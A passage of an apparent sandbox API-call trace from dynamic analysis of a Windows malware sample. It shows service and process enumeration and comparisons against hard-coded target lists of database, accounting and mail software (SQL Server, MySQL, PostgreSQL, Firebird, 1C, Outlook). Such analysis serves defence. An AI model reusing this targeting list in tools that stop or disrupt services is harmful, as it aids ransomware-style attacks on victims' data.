(lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.716] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0044.716] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0044.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0044.716] lstrlenW (lpString="RpcSs") returned 5 [0044.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0044.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0044.716] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0044.716] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0044.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0044.717] lstrlenW (lpString="SamSs") returned 5 [0044.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0044.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0044.717] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0044.717] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0044.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0044.717] lstrlenW (lpString="Schedule") returned 8 [0044.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0044.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0044.717] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0044.717] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0044.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0044.717] lstrlenW (lpString="SENS") returned 4 [0044.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0044.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0044.717] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0044.717] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0044.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0044.717] lstrlenW (lpString="ShellHWDetection") returned 16 [0044.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0044.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0044.717] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0044.717] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0044.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0044.717] lstrlenW (lpString="Spooler") returned 7 [0044.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0044.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0044.717] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0044.717] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0044.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0044.717] lstrlenW (lpString="swprv") returned 5 [0044.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0044.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0044.717] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0044.718] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0044.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0044.718] lstrlenW (lpString="SysMain") returned 7 [0044.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0044.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0044.718] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0044.718] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0044.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0044.718] lstrlenW (lpString="Themes") returned 6 [0044.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0044.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0044.718] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0044.718] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0044.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0044.718] lstrlenW (lpString="TrkWks") returned 6 [0044.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0044.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0044.718] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0044.718] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0044.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0044.718] lstrlenW (lpString="UxSms") returned 5 [0044.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0044.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0044.718] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0044.718] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0044.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0044.718] lstrlenW (lpString="VSS") returned 3 [0044.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0044.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0044.718] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0044.718] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0044.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0044.718] lstrlenW (lpString="WdiServiceHost") returned 14 [0044.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0044.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0044.719] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0044.719] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0044.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0044.719] lstrlenW (lpString="WdiSystemHost") returned 13 [0044.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0044.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0044.719] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0044.719] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0044.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0044.719] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0044.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0044.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0044.719] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0044.719] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0044.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0044.719] lstrlenW (lpString="Winmgmt") returned 7 [0044.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0044.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0044.719] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0044.719] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0044.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0044.719] lstrlenW (lpString="WPDBusEnum") returned 10 [0044.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0044.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0044.719] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0044.719] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0044.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0044.719] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0044.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b8 [0044.722] Process32FirstW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0044.723] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0044.723] lstrlenW (lpString="System") returned 6 [0044.723] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0044.723] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0044.723] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0044.723] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0044.723] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0044.723] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0044.723] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0044.723] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0044.724] lstrlenW (lpString="smss.exe") returned 8 [0044.724] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0044.771] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0044.771] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0044.771] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0044.771] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0044.771] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0044.771] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0044.771] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.772] lstrlenW (lpString="csrss.exe") returned 9 [0044.772] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0044.772] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0044.772] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0044.772] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0044.772] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0044.772] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0044.772] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0044.772] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0044.773] lstrlenW (lpString="wininit.exe") returned 11 [0044.773] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0044.773] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0044.773] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0044.773] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.774] lstrlenW (lpString="csrss.exe") returned 9 [0044.774] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0044.774] lstrlenW (lpString="winlogon.exe") returned 12 [0044.774] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0044.775] lstrlenW (lpString="services.exe") returned 12 [0044.775] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0044.776] lstrlenW (lpString="lsass.exe") returned 9 [0044.776] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0044.776] lstrlenW (lpString="lsm.exe") returned 7 [0044.776] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.777] lstrlenW (lpString="svchost.exe") returned 11 [0044.777] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.778] lstrlenW (lpString="svchost.exe") returned 11 [0044.778] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.779] lstrlenW (lpString="svchost.exe") returned 11 [0044.779] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.779] lstrlenW (lpString="svchost.exe") returned 11 [0044.779] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.780] lstrlenW (lpString="svchost.exe") returned 11 [0044.780] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0044.780] lstrlenW (lpString="audiodg.exe") returned 11 [0044.781] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.781] lstrlenW (lpString="svchost.exe") returned 11 [0044.781] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.782] lstrlenW (lpString="svchost.exe") returned 11 [0044.782] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0044.782] lstrlenW (lpString="dwm.exe") returned 7 [0044.782] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0044.783] lstrlenW (lpString="explorer.exe") returned 12 [0044.783] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0044.784] lstrlenW (lpString="spoolsv.exe") returned 11 [0044.784] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0044.784] lstrlenW (lpString="taskhost.exe") returned 12 [0044.785] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.785] lstrlenW (lpString="svchost.exe") returned 11 [0044.785] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0044.786] lstrlenW (lpString="taskeng.exe") returned 11 [0044.786] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0044.786] lstrlenW (lpString="taskhost.exe") returned 12 [0044.786] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0044.787] lstrlenW (lpString="carried trinity.exe") returned 19 [0044.787] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0044.788] lstrlenW (lpString="heaven.exe") returned 10 [0044.788] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0044.788] lstrlenW (lpString="dell.exe") returned 8 [0044.788] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0044.789] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0044.789] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0044.790] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0044.790] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0045.045] lstrlenW (lpString="til ear equal.exe") returned 17 [0045.045] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0045.046] lstrlenW (lpString="itunes-bring.exe") returned 16 [0045.046] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0045.047] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0045.047] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0045.047] lstrlenW (lpString="philadelphia.exe") returned 16 [0045.047] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0045.048] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0045.048] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0045.049] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0045.049] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0045.049] lstrlenW (lpString="fraud stuck.exe") returned 15 [0045.050] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0045.050] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0045.050] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0045.051] lstrlenW (lpString="attended.exe") returned 12 [0045.051] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0045.052] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0045.052] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0045.059] lstrlenW (lpString="pan physician.exe") returned 17 [0045.059] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0045.060] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0045.060] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0045.060] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0045.060] Process32NextW (in: 